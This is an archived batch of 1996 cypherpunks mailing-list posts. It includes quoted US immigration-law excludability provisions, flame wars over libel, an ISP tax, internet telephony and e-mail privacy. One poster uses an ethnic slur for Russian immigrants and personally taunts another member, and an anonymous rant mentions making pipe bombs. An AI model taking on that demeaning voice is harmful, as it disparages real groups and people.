   (II)  the maximum penalty possible for the crime of which the alien was
         convicted (or which the alien admits having committed or of which the
         acts that the alien admits having committed constituted the essential
         elements) did not exceed imprisonment for one year and, the alien was
         not sentenced to a term of imprisonment in excess of 6 months
         (regardless of the extent to which the sentence was ultimately
         executed).
 (B) MULTIPLE CRIMINAL CONVICTIONS.-- Any alien convicted of 2 or more offenses
     (other than purely political offenses), regardless of whether the
     conviction was in a single trial or whether the offenses arose from a
     single scheme of misconduct and regardless of whether the offenses
     involved moral turpitude, for which the aggregate sentences to confinement
     actually imposed were 5 years or more is excludable.
 (D) PROSTITUTION AND COMMERCIALIZED VICE.-- Any alien who--
  (i)   is coming to the United States solely, principally, or incidentally to
        engage in prostitution, or has engaged in prostitution within 10 years
        of the date of application for a visa, entry, or adjustment of status,
  (ii)  directly or indirectly procures or attempts to procure, or (within 10
        years of the date of application for a visa, entry, or adjustment of
        status) procured or attempted to procure or to import, prostitutes or
        persons for the purpose of prostitution, or receives or (within such
        10-year period) received, in whole or in part, the proceeds of
        prostitution, or
  (iii) is coming to the United States to engage in any other unlawful
        commercialized vice whether or not related to prostitution,
     is excludable.
 (E) CERTAIN ALIENS INVOLVED IN SERIOUS CRIMINAL ACTIVITY WHO HAVE ASSERTED
     IMMUNITY FROM PROSECUTION.--Any alien--
  (i)   who has committed in the United States at any time a serious criminal
        offense (as defined in section 101(h)),
  (ii)  for whom immunity from criminal jurisdiction was exercised with
        respect to that offense,
  (iii) who as a consequence of the offense and exercise of immunity has
        departed from the United States, and
  (iv)  who has not subsequently submitted fully to the jurisdiction of the
        court in the United States having jurisdiction with respect to that
        offense,
     is excludable.
 (F) WAIVER AUTHORIZED.-- For provisions authorizing waiver of certain
     subparagraphs of this paragraph, see subsection (h).

(3) SECURITY AND RELATED GROUNDS.--
 (A) IN GENERAL.-- Any alien who a consular officer or the Attorney General
     knows, or has reasonable ground to believe, seeks to enter the United
     States to engage solely, principally, or incidentally in--
  (i)   any activity to violate any law of the United States relating to
        espionage or sabotage or to violate or evade any law prohibiting the
        export from the United States of goods, technology, or sensitive
        information,
  (ii)  any other unlawful activity, or
  (iii) any activity a purpose of which is the opposition to, or the control or
        overthrow of, the Government of the United States by force, violence,
        or other unlawful means,
     is excludable.
 (B) TERRORIST ACTIVITIES. --
  (i)   IN GENERAL.-- Any alien who--
   (I)   has engaged in terrorist activity, or
   (II)  a consular officer of the Attorney General knows, or has reasonable
         ground to believe, is likely to engage after entry in any terrorist
         activity (as defined in clause (iii)),
        is excludable.
        An alien who is an officer, official, representative, or spokesman of
        the Palestine Liberation Organization is considered, for purpose of
        this Act, to be engaged in a terrorist activity.
  (ii)  TERRORIST ACTIVITY DEFINED.-- As used in this Act, the term 'terrorist
        activity' means any activity which is unlawful under the laws of the
        place where it is committed (or which, if committed in the United
        States, would be unlawful under the laws of the United States or any
        State) and which involves any to the following:
   (I)   The hijacking or sabotaging of any conveyance (including aircraft,
         vessel, or vehicle).
   (II)  The seizing or detaining, and threatening to kill, injure, or continue
         to detain, another individual in order to compel a third person
         (including a governmental organization) to do or abstain from doing
         any act as an explicit or implicit condition for the release of the
         individual seized or detained.
   (III) A violent attack upon an internationally protected person (as defined
         in section 1116 (b)(4) of title 18, United States Code) or upon the
         liberty of such a person.
   (IV)  An assassination.
   (V)   The use of any--
    (a)   biological agent, chemical agent, or nuclear weapon or device, or
    (b)   explosive or firearm (other than for mere personal monetary gain),
          with the intent to endanger, directly or indirectly, the safety of
          one or more individuals or to cause substantial damage to property.
   (VI)  A threat, attempt, or conspiracy to do any of the foregoing.
  (iii) ENGAGE IN TERRORIST ACTIVITY DEFINED.-- As used in this Act, the term
        `engage in terrorist activity' means to commit, in an individual
        capacity or as a member of an organization, an act which the actor
        knows or reasonably should know, afford material support to an
        individual organization or government in conducting a terrorist
        activity at any time, including any of the following acts;
   (I)   The preparation or planning of a terrorist activity.
   (II)  The gathering of information on potential targets for terrorist
         activity.
   (III) The providing of any type of material support, including a safe house,
         transportation, communications, funds, false identification, weapons,
         explosives, of training, to any individual the actor knows or has
         reason to believe has committed or plans to commit a terrorist
         activity.
   (IV)  The soliciting of funds or other things of value for terrorist
         activity or for any terrorist organization.
   (V)   The solicitation of any individual for membership in a terrorist
         organization, terrorist government, or to engage in a terrorist
         activity.

A bunch of other stuff not relevant to Phil deleted. Note: I generally like
what Phil says, but I don't like people who threaten libel lawsuits over
something said on the Internet.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 7 Aug 1996 15:01:47 +0800
To: cypherpunks@toad.com
Subject: Re: Internal Passports
In-Reply-To: <2.2.32.19960806100644.00911380@panix.com>
Message-ID: <D3o0RD47w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell <frissell@panix.com> writes:
> Naughty naughty Tim.  You're violating the Immigration Control and
> Nationality Act of 1986.  You are supposed to check all employee's IDs even
> your own childrens' and fill out that I-9 form.  You have to verify identity
> and right to work using a menu of documents ranging from passports and SS
> cards to Driver's licenses and "American Indian Tribal Documents" (I gotta
> get me some of them).  And there are special provisions to punish
> discrimination against those who appear foreign. ...

In New York State, there are periodic complaints from Sovok "refugees" like
Igor Chewed-Off, who come in with a I-94 visa (and authorization to work), and
get the green card after two years. They get welfare, but apply for jobs...
Some poor employer slob refuses to hire the Sovok, thinking mistakenly that he
can only hire amcits or green card holders (even though I-94 with authorization
is listed on I-9). The employer pays a hefty fine for "illegal discrimination",
of which the Sovok gets a cut. Nice racket. Did you ever try it, Igor?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Allen Robinson <sebago@earthlink.net>
Date: Wed, 7 Aug 1996 19:32:00 +0800
To: cypherpunks@toad.com
Subject: "Eternity service" paper request
Message-ID: <199608070146.VAA04336@norway.it.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Tue Aug 06 20:53:31 1996
A couple of weeks ago Hal mentioned Ross Anderson's Eternity
Service paper (URL: http://www.cl.cam.ac.uk:80/users/rja14/#Lib).

As Hal described it at the time:

>The goal of the Eternity service is to make published information
>permanently and ineradicably available, despite efforts on the part of
>powerful attackers to destroy it.  The attack model explicitly
>includes governments.  This has obvious relevance to current
>controversies involving copyright, trade secrets, etc.

[. . . .]

>Anderson's basic concept is of a network of storage servers in widely
>scattered jurisdictions.  He uses cryptography so that although the
>servers store data, no single computer knows exactly what is stored in
>the encrypted files it holds.  Keys to the data are spread across the
>network using secret sharing techniques, with mutual cooperation among
>the servers being necessary to decrypt files.  (I believe the files
>themselves are redundantly stored on individual servers, but they are
>encrypted with keys which are split.)  Anonymous communications are
>used among the network of computers to reply to requests, so that
>attackers can't tell which computer produced a requested document.

At the time I thought this sounds quite interesting and filed the 
information away for a time when I would have an opportunity to
get the paper and read it.  I finally created that opportunity
recently only to find the paper at the above URL in a format I have
a *lot* of difficulty reading.  I'm a little embarrassed to ask such a
thing, but does anyone know a location where this paper resides in
plain-vanilla ASCII?

Many thanks.

AR

#%#%#%#%#%#%#%#%#%#%#%#%#%#%#%#%#%#%#%#
"The road to tyranny, we must never forget, begins with the
destruction of the truth." -- Bill Clinton, Oct. 15, 1995
at the University of Connecticut.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Quis custodiet ipsos custodes?
Allen Robinson.........................sebago@earthlink.net
PGP public key FE4A0A75     available from major keyservers
fingerprint 170FBC1F7609B76F 967F1CC8FCA7A41F

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgf3H3sdZ07+Sgp1AQHEYQP/cthh/U8MwguYjuDJkrMNScwCaLrBm+rv
7SJS5Oogln7ItVfMDCUGISVNABCg4gr4taqW8OnStmegZxqsYJevLu5qYVTPvdWG
wPDbBu2rHfHc6aHS1am727Vv9EJTb452tlDkXQuQApH4TUh9mYUe6oIxVenKSxNC
jbPGgzxgvvo=
=qhoi
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 7 Aug 1996 16:25:16 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <9608070525.AA02577@Etna.ai.mit.edu>
Message-ID: <Pine.SUN.3.91.960806222122.18670B-100000@crl7.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 7 Aug 1996 hallam@Etna.ai.mit.edu wrote:

> 
> Au contraire, the UK is as obnoxious in exporting its laws as
> the US...

Fine, Phillll can sue in the UK.  I'm sure Alan is quaking in his
boots at the prospect.  As I said, Phillll is going to have a 
tough time prevailing.  Of course, if Phillll thinks he has a
winner, he should double dip and offer me a wager on the outcome
of his suit.  (Yeah, that'll happen when primates take wing out 
of my derriere.)


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 7 Aug 1996 20:27:39 +0800
To: cypherpunks@toad.com
Subject: Phill's evil twin Skippy
In-Reply-To: <199608062350.QAA18315@web.azstarnet.com>
Message-ID: <v03007801ae2dad9e03f0@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:50 PM -0400 8/6/96, David M. Rose wrote:
> Oh goody! Another Hallam-Baker-generated p*ssing contest.  Perhaps you
> fellows should settle your differences with a bet. Oops, I forgot. The good
> "Doc" dishonors his wagers with a series of fantastic and infantile
> "misunderstandings".


The weirdest thing happened to me today. (Nooo, not *that* wierd thing,
something *else*.) A gentleman proporting to be Phill Hallam-Baker (at
least his check said so, and they actually *do* clear...) showed up at the
DCSB meeting and had lunch. Very pleasant guy.  Quite civil, if a little
bit statist, and way too Hegelian for my blood...

Frankly, I think someone's *spoofing* Dr. Hallam-Baker, on the net or in
person. I can't figure out which one's which.

Anyone have some theories on this? Does he have an evil twin Skippy? The
world wants to know.

Will the real Phillip Hallam-Baker please stand up and thottle your evil twin?

Cheers,
Bob Hettinga




-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 7 Aug 1996 20:14:12 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Digital Telephony costs $2
Message-ID: <199608070602.XAA21713@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:34 PM 8/5/96 -0800, you wrote:
>What is unclear, however, is WHY they "had to" build a card that couldn't do 
>full-duplex.  I mean, would there have been a problem implementing that?  Or 
>was this just another one of those stupid design decisions which could have 
>been easily fixed if it had been realized in time?

1) Costs money - especially critical if you're trying to either
-  get a new product accepted by the market (when they were becoming popular) or
-  compete in a me-too market (after they became popular and costs came way
down.)
2) DSPs tend to be really tight on resources, especially RAM,
   which you need to do multiple programs at once.  $5-10 DSPs are 
   especially tight.  They're starting to come with mini operating systems.
3) They probably didn't think of Internet Telephony as a market
-  They were PC folks, and while _we_ all knew about the Internet,
   it was probably 1/4 as big as now and earlier on the hype curve
-  It's only been recently that soundcards have been ubiquitous enough
   for people to assume they're there for a product like Internet phone
-  28.8 modems are fast enough.  14.4 are marginal.  9.6 is _really_ marginal.
4) Most of their market wants other things - MIDI, game noises,
   talking applications, occasional recording and sound processing.
   Voice crunching is mostly used for answering machines and 
   fancy voice-response telephony units "Press 1 if you want to Press 2."

>> It also has the advantage
>>that the data is being moved through your CPU, so encryption is
>>an easy add-on, rather than having one combined modem/voiceblaster
>>card which doesn't have any hooks for crypto or other processing.
>Well, I assume that if implemented as a new type of modem card, the 
>processor can be used to do the data transfer.

If you're doing the voice crunching and A/D conversion and telephony
all on the modem card, with everything tightly integrated
to fit in your tiny cache, why put in hooks for the processor to intervene?

>>Given that the "3KHz" is almost universally transmitted over 64kbps
>>digital channels, there's really no point in pushing past 33.6 with
>>analog-based coding; better to just do ISDN. 
>
>The local phonecos still want to overcharge for ISDN, however.  Major 
>bigtime problem.  ISDN looked great back in about 1980 when the fastest 
>common modem was 300 baud, but it's lost much of its lustre competing 
>against 33.6 kbps.  Maybe if ISDN were available at a premium of $5 per 
>month or so...

Depends on the telco.  Here in PacBell's fiefdom, home ISDN costs only
a bit more than two voice lines, and you get two lines out of it.
Local calls are a penny or four a minute daytime, free at night.
This may change soon - the telco is appalled to find out that
computer people think "it's free at night" means "it's free at night" :-)

There's getting to be enough ISDN support that an ISDN-based 
phone program might find some market - especially if it can use
higher sampling rates and ADPCM compression to get better sound out of
56-64 kbps than a regular phone can, and maybe you could support a
shared-whiteboard program as well.  Still need to do something about
echo control, though.  However, I wouldn't recommend writing a free
encrypted ISDN telephone program, though - you wouldn't be able
to export that on the Internet.  But a phone program that lets users plug in
their own algorithms for echo control, with an API that supports
exchanging parameters - now _that_ would be a phone program.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 7 Aug 1996 19:35:36 +0800
To: cypherpunks@toad.com
Subject: Apple people on the list
Message-ID: <199608062315.XAA27999@pipe5.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


I'd like to hear Tim, too, in this Big Apple. RealAudio, perhaps. 
 
 
Tim's views are far more substantial and worthwhile than those play-it-safe
Pro-Code dronings. 
 
 
And his pith should go out far and wide, around the world, not only out
there on its edge. 
 
 
Vinnie, Robert, All Appledom, do your global duty, don't miss this chance
to leapfrog the small-beans promoters of the crypto industry. 
 
 
What would you offer to set off Tim's simmering crypto-anarcho-volcano,
make it heard round the planet? 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 7 Aug 1996 19:25:41 +0800
To: CYPHERPUNKS@toad.com
Subject: re:THE WORLD IS SCREWD UP
Message-ID: <199608070617.XAA03942@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:02 PM 8/6/96 -0500, you wrote:
>THIS WORLD IS SREWED UP i hate my life so mue hobbeys makeing time pipe 
>bommbs so what is this all about huh what the fuck "anti terrisiom bill" 
>damn sad ok so what does  this mean FREE COUNTRY hahahaha i laugh when i 
>hear that term there is no free country and we never have a wright to 
>privesy u know man this sux so much....... oh and to the government u can 
>kiss my ass


TAKE it to a shrink... not Cypherpunks!

Ps. learn to spell!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 7 Aug 1996 18:11:03 +0800
To: cypherpunks@toad.com
Subject: Re: Cookies on Microsoft Explorer?
Message-ID: <2.2.32.19960807070636.00a7ffa8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:14 AM 8/6/96 -0700, David.K.Merriman.-.webmaster@cygnus.com, wrote:

>I have IE3 configured to ask me for permission to accept a cookie. Yes, 
>some sites send (n!)+1 cookies during a session. If they send too many, I 
>personally move on to another site, after sending them email (!).

If the site sends you *LOTS* of cookies with no expire date, then they have
probibly compiled their Apache server with the mod_cookie module.  The
cookies are only used by the log files and i am willing to bet that most
people who have that option compiled in do not even read the logs.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 7 Aug 1996 16:20:27 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <9608070531.AA02593@Etna.ai.mit.edu>
Message-ID: <199608070525.AAA21051@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


hallam@Etna.ai.mit.edu wrote:
> 
> 
> I was rather more angry that Alan published a private correspondence
> on a public mailing list. I live in the same city as between twenty
> and thirty members of a group that have in the past tried to murder my
> familly. If he wasn;t such a fool he would have realised that I deliberately
> did not post the message to the list. 
> 

Wow! Why did they want to murder your family?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Wed, 7 Aug 1996 17:08:21 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <Pine.SUN.3.91.960806175813.20074A-100000@crl4.crl.com>
Message-ID: <9608070525.AA02577@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Au contraire, the UK is as obnoxious in exporting its laws as the
US. The Prime Minister of Greece when (accurately) accused of corruption
in the Greek press sued them in the UK courts and won $200K

In recent years many Tory Grandees have benefited from the libel
lottery. Amongst them Lord Aldington who was accused of being involved
in war crimes during WWII and 'won" 1.75 million which the European
Court of Human rights rejected as being "disproportionate". Lord
Archer recently won $1 million after a couple of newspapers alledged
that he might have been sleeping with the prostitute he was photographed
giving 5000GBP to (and afterwards claimed not to have met).

With the exception of the suicide act its probabky the stupidest and
most damaging law that ever got passed in the English system.

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Wed, 7 Aug 1996 16:07:58 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <199608070205.VAA17482@manifold.algebra.com>
Message-ID: <9608070531.AA02593@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



I was rather more angry that Alan published a private correspondence
on a public mailing list. I live in the same city as between twenty
and thirty members of a group that have in the past tried to murder my
familly. If he wasn;t such a fool he would have realised that I deliberately
did not post the message to the list. 

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blane@aa.net (Brian C. Lane)
Date: Wed, 7 Aug 1996 17:49:14 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: ****Tacoma, Washington Starts Taxing Internet Access 07/30/96
In-Reply-To: <2.2.32.19960805181729.00e8c4a0@mail.teleport.com>
Message-ID: <320824da.6417327@mail.aa.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 05 Aug 1996 11:17:29 -0700, you wrote:

>At 05:42 AM 8/5/96 -1000, NetSurfer wrote:
>>
>>On Wed, 31 Jul 1996, Joseph M. Reagle Jr. wrote:
>>
>>>   	  				 
>>> >WASHINGTON, DC, U.S.A., 1996 JUL 30 (NB) -- By Bill Pietrucha.  
>>> >Tacoma, Washington, has just gained the distinction of being the 
>>> >only municipality in the United States to tax Internet Access 
>>> >providers (IAPs) like telephone service providers. 
>>> >
>I believe the reason the Tacoma ordinance is getting so much flack is that
>they are wanting to charge sales tax on all transactions that take place
>from ISPs in Tacoma.

  A slight correction. They are imposing a 6% tax on the Gross receipts of
all Internet Providers who have customers in Tacoma. This includes AOL,
Compu$erve, and my local favorites - aa.net and eskimo.com

  Tacoma also wants these companies to buy a $72 a year business license.
There are the beginnings of an uprising against this, the mayor has called
for it to be repealed, but the City Council (In all of its bureaucratic
wisdom) wants to wait and see what happens. There's a public meeting on the
27th of August.

>
>This type of taxation is not new.  Various jurisdictions have tried to use
>the same thing on mail order houses.  Having worked for a service bureau
>that dealt with mail order, I know what a hassle it is to try to keep track
>of such taxation.  There is a company that will sell you the data of all of
>the sales tax rates throughout the country.  This includes every little
>podunk city, county, and fire district tax.  They are divided by zip code,
>but that is no guarantees that you have the right place. The reality is that
>trying to "be legal" under such regulations is next to impossible, even with
>the proper data.  I know of few mail order firms that are willing to go to
>that extreme.  (Unless, of course, they have gotten the proper threats from
>some miffed tax baron.)

  Plus the fact that the taxation of these services (well, IMHO all
taxation is ...) is not based on services provided to the business by the
city. My provider is located in seattle, and has lines in Tacoma. They use
no Tacoma services, and yet Tacoma says that the provider owes them money.

  Its just another grab for money by the simple minded bureaucrats.
Hopefully we can toss some more of these jokers out of office the next
election.

   Brian

p.s. Sorry for the previous aborted message. The printer dialog popped up
in the middle of typing and it the message somehow got sent out.

------- <blane@aa.net> -------------------- <http://www.aa.net/~blane> -------
     Embedded Systems Programmer, quick hacks on request, CryptoAnarchist
==============  11 99 3D DB 63 4D 0B 22  15 DC 5A 12 71 DE EE 36  ============




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 7 Aug 1996 21:31:11 +0800
To: cypherpunks@toad.com
Subject: Re: Corporate e-mail policy
Message-ID: <199608070312.FAA27390@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


I used to work for a company which had a surprisingly liberal policy about e-mail.The gist of it was:

    "Private e-mail will not be read by anyone other than the recipient. The
    only exceptions to this are:
        1) Systems personnel may examine mail messages to determine if the mail
           system is working correctly; [e.g., checking mail logs against users'
           mailbox contents to verify delivery]
        2) [basically said e-mail would be treated like any other system files
           in the event of a criminal investigation, etc.]"

The policy specifically required authorization from the line VP for either of these actions, and reinforced that the systems people were to treat the e-mail as administratively confidential data.

The only time I heard of anyone even asking for e-mail was when a project manager wanted a copy of a message that a sponsor sent to one of his subordinates, who was on vacation. The systems folks cited the policy, the line VP backed them up, and the manager went away empty-handed. (He wound up calling the subordinate at her hotel and browbeating her into authorizing the computer center folks to forward a copy of the message to the manager. But that's another story.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Schryvers <schryver@radiks.net>
Date: Wed, 7 Aug 1996 22:29:49 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199608071019.FAA15721@sr.radiks.net>
MIME-Version: 1.0
Content-Type: text/plain


NBC News at Sunrise has just announced the discovery of alien life on the 
planet Mars.  The lifeform that became extinct more than 2 billion years
ago was found as a fossil in a meteor that originated from mars and landed
on earth.  The fossil found was a primitive germ life form.

PGP encrypted mail preferred.  
E-Mail me for my key.
Scott J. Schryvers <schryver@radiks.net>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 7 Aug 1996 22:44:14 +0800
To: cypherpunks@toad.com
Subject: Re: Censorship through proxy
Message-ID: <2.2.32.19960807101315.0091e068@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:12 PM 8/6/96 -0700, Timothy C. May wrote:
>Sing Sing (the country is now a prison, so...) is one of the states we
>should think about targetting for "special attention." Not in the sense of
>violence, but in the sense of offering help to freedom fighters, those who
>want to use stego, web proxies, etc.

I've been thinking of starting a "How to Defeat a Government page to pull
together some of the anti-Sysadmin resources on the Net.  "Your government
-- just a rouge sysadmin."

>I wonder what would happen if "Computers, Freedom, and Privacy '98" was
>held in Sing Sing?

It would be smaller going out than coming in.  Singapore's retired president
tried to get William Safire into town for a "debate" about whether he was
still running the place via his son.  Safire didn't take the bait.  He joked
about it in his column.  

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 7 Aug 1996 21:48:40 +0800
To: cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
Message-ID: <2.2.32.19960807101317.00928848@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:38 PM 8/6/96 -0400, hallam@Etna.ai.mit.edu wrote:

>which such a claim was made. As for the UK laws, there is 
>practically no defense against a libel claim that one can
>file in court. There is absolutely no basis on which to 
>justify them. This is why the Singapore government uses them
>as a form of censorship.

There was a recent US appeals court decision in which an attempt to enforce
a UK libel judgment was rejected on First Amendment grounds.  The court
refused to allow the application of UK law here.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 7 Aug 1996 22:41:19 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Freeh slimes again: Digital Telephony costs $2 billion now   ...
Message-ID: <2.2.32.19960807110349.0090e5f4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:59 PM 8/6/96 -0700, Bill Stewart wrote:

>I haven't been able to find the reference, but a month or two ago
>there was an article on the net or in a newspaper about the targets
>of wiretapping - how many wiretaps were for drugs, gambling, tax evasion,
>and of course terrorism.  The number of wiretaps for bombs and guns
>was something low like 80 in the last 5-10 years - about 1/10%. 
>        (Did anybody else see this article??)

Gilmore has a chart on wiretap use in various crimes in his Brain Tennis
match on Wired:

http://www.hotwired.com/braintennis/96/32/index0a.html

DCF







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Wed, 7 Aug 1996 18:12:17 +0800
To: cypherpunks@toad.com
Subject: Re: crypto CD source
Message-ID: <9608070607.AA05020@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Wed Aug 07 08:04:50 1996
That's all well (your diverse site/mirror-suggestions), but my local 
phonecompany charges by the minute. If I download the lets say 500MB for 
the CD, I'm broke! Does anyone have direkt access to the sites and can make 
a DAT-backup? (In some format I can read: WinNT Backupprog)?

Thanks,
Remo

- --------< fate favors the prepared mind >--------
Remo Pini                            rp@rpini.com
PGP:  http://www.rpini.com/remopini/rpcrypto.html
- ------< words are what reality is made of >------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMggyBhFhy5sz+bTpAQGLjQf9EX3/mJQa6woKTZN5uz8dma8Cpv/PFQTC
zsV5h0pjDLiA0RdIZexPJMfTNw+ZFyPdNkma9PgB60kGf2CrNrqLlBWv5XmZQ2HH
kTqcuou2mHm/JeJv5m8v7Vckm8BmTtvdpL2mWK8pG0iB5fWbwiTo9VkyCrwfq/q+
BoAaGS4zkNOTuTlmWo/zwkheEVdV5gRjwI+IyHCTQMZ9rFRqLvmOYxClcEQ0X7C4
X5pFIZgaxw7u953MNbnmyeGVwpHqahhi8mn8mblKpVG2KIxR17lC9lKcZFygTAqA
eddDvrCnCNcyH4zrWksOvPCZfqQbH5mBuFskxjSC1ZXgz+1ZoGKpOw==
=veJq
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Wed, 7 Aug 1996 18:17:25 +0800
To: cypherpunks@toad.com
Subject: Re: THE WORLD IS SCREWD UP
Message-ID: <9608070619.AA05456@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Wed Aug 07 08:16:48 1996
> THIS WORLD IS SREWED UP i hate my life so mue hobbeys makeing time pipe
> bommbs so what is this all about huh what the fuck "anti terrisiom bill"
> damn sad ok so what does  this mean FREE COUNTRY hahahaha i laugh when i
> hear that term there is no free country and we never have a wright to 
> privesy u know man this sux so much....... oh and to the government u
> can kiss my ass

And here I was thinking my English sucks! By the way, keyboard do have keys 
like ".,;:".

:-)


- --------< fate favors the prepared mind >--------
Remo Pini                            rp@rpini.com
PGP:  http://www.rpini.com/remopini/rpcrypto.html
- ------< words are what reality is made of >------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMgg01BFhy5sz+bTpAQFz9ggArJOn4g8i/xREcEAjYXAO5oB+Jt6wUox1
dMh9GYpoYiYkb2qzpvQ9kK7JRMbehZRqhsltPQ7ydn1hNs/v+O+M4MG6I0FoIJg4
mmpEY7DDfLmqyPUAgEFq07re3pGraeteLFdSTlDvjxiBNw2+0K1EjQWHVVgxT/2p
CKeKW8/v/dSA68TFVFcBlYKbNYZREUeEhTLhFLmuXXXkJcC3orrO0ODaENT7MWUz
o1uCPq0v+XM+WMhNji5dIkVN6/SJQ0QT1MjocCmOFuMAa/UW8lwX2BPqBvI3K1ao
EOb8hHDut+yMExRI2X6rtC3u8lgvm/8i58BBc1IncuI1Oxgn1ivmDw==
=hwr+
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Neely <accessnt@ozemail.com.au>
Date: Wed, 7 Aug 1996 18:22:35 +0800
To: cypherpunks@toad.com
Subject: The Solution: 20 Beautiful women
Message-ID: <2.2.32.19960807080312.00695a08@ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Fellow Cypherpunks,

Maths was never my strong point, but this response (from my statistician
g/f) sounds convincing...but then, maybe I'm biased :)

